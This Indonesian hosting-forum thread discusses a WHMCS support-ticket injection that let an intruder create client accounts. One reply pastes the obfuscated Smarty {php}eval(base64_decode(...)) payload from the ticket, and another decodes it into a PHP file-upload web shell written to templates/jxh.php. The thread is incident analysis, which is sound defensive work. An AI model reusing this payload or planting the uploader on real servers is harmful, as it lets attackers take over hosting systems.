Injeksi lewat SUPPORT TICKET WHMCS

premium · 24 Jan 2012

TOLONGGG

Kali ini injeksi melalui tiket support , si penyusup berhasil buat user klien di WHMCS. Ngeri cuy....

IIXPLANET · 24 Jan 2012

dari lognya apakah ada tersimpan url2 / detail mengenai si attacker tersebut pak premium ?

sigmabisnis · 24 Jan 2012

premium said:
TOLONGGG
Kali ini injeksi melalui tiket support , si penyusup berhasil buat user klien di WHMCS. Ngeri cuy....

Waawduuh.. makin serem and ngeri aja nihhh cuy.... moga2 aja tidak sampai terjadi hal-hal yg tidak diinginkan...

IIXPLANET · 24 Jan 2012

klo injeksi lewat tiket dengan membuat new user baru sudah ada sepertinya di versi2 sebelum ini , cm nda tahu klo belum di patch atau memang ada hole baru terkait dr ticket tersebut .

premium · 24 Jan 2012

vishualhost said:
klo injeksi lewat tiket dengan membuat new user baru sudah ada sepertinya di versi2 sebelum ini , cm nda tahu klo belum di patch atau memang ada hole baru terkait dr ticket tersebut .

pny saya sdh 5.0.3 dan sdh patch ini

Code:

http://forum.whmcs.com/showthread.php?t=43462

premium · 24 Jan 2012

vishualhost said:
dari lognya apakah ada tersimpan url2 / detail mengenai si attacker tersebut pak premium ?

ga ada.... semua asal tulis.. cuma IP doank... toh ip bs dynamic dan proxy / gmn gt

hostguin · 24 Jan 2012

premium said:
pny saya sdh 5.0.3 dan sdh patch ini

Code:

http://forum.whmcs.com/showthread.php?t=43462

bukannya kalau sudah 5.0.3 gak perlu patch lagi ?
cmiiw

premium · 24 Jan 2012

mencarimakan said:
bukannya kalau sudah 5.0.3 gak perlu patch lagi ?
cmiiw

hrsnya gt sih masbro..tp sy diberikan link itu utk mslh itu...

klo mmg sdh 5.0.3 sdh aman dari mslh ini, knp saya msh rawan di inject gtan.. gwt jg

ini kode nya

Code:

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})

hostguin · 24 Jan 2012

Setahu saya, kalau sudah 5.0.3 jangan dipatch lagi. Dari thread tentang patch dan 5.0.3 duluan patchnya. Jadi patch nya keluar duluan sebelum 5.0.3.

Selain itu gunakan trik dari mas bro Indonic, http://www.diskusiwebhosting.com/sh...ORT-TICKET-WHMCS?p=56144&viewfull=1#post56144

nicosoftmedia · 24 Jan 2012

premium said:

Code:

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})

Hasil decode pertama :

$code = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");
$fo = fopen("templates/jxh.php","w");
fwrite($fo,$code);

dan setelah di decode lagi hasilnya :

<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>

Sepertinya memang dari dulu banyak yang ingin jahil untuk memanfaatkan setiap hosting untuk link sebagai RL.

Injeksi lewat SUPPORT TICKET WHMCS

premium

Poster 2.0

IIXPLANET

Expert 2.0

sigmabisnis

Hosting Guru

IIXPLANET

Expert 2.0

premium

Poster 2.0

premium

Poster 2.0

hostguin

Expert 1.0

premium

Poster 2.0

hostguin

Expert 1.0

nicosoftmedia

(RIP) Community Guide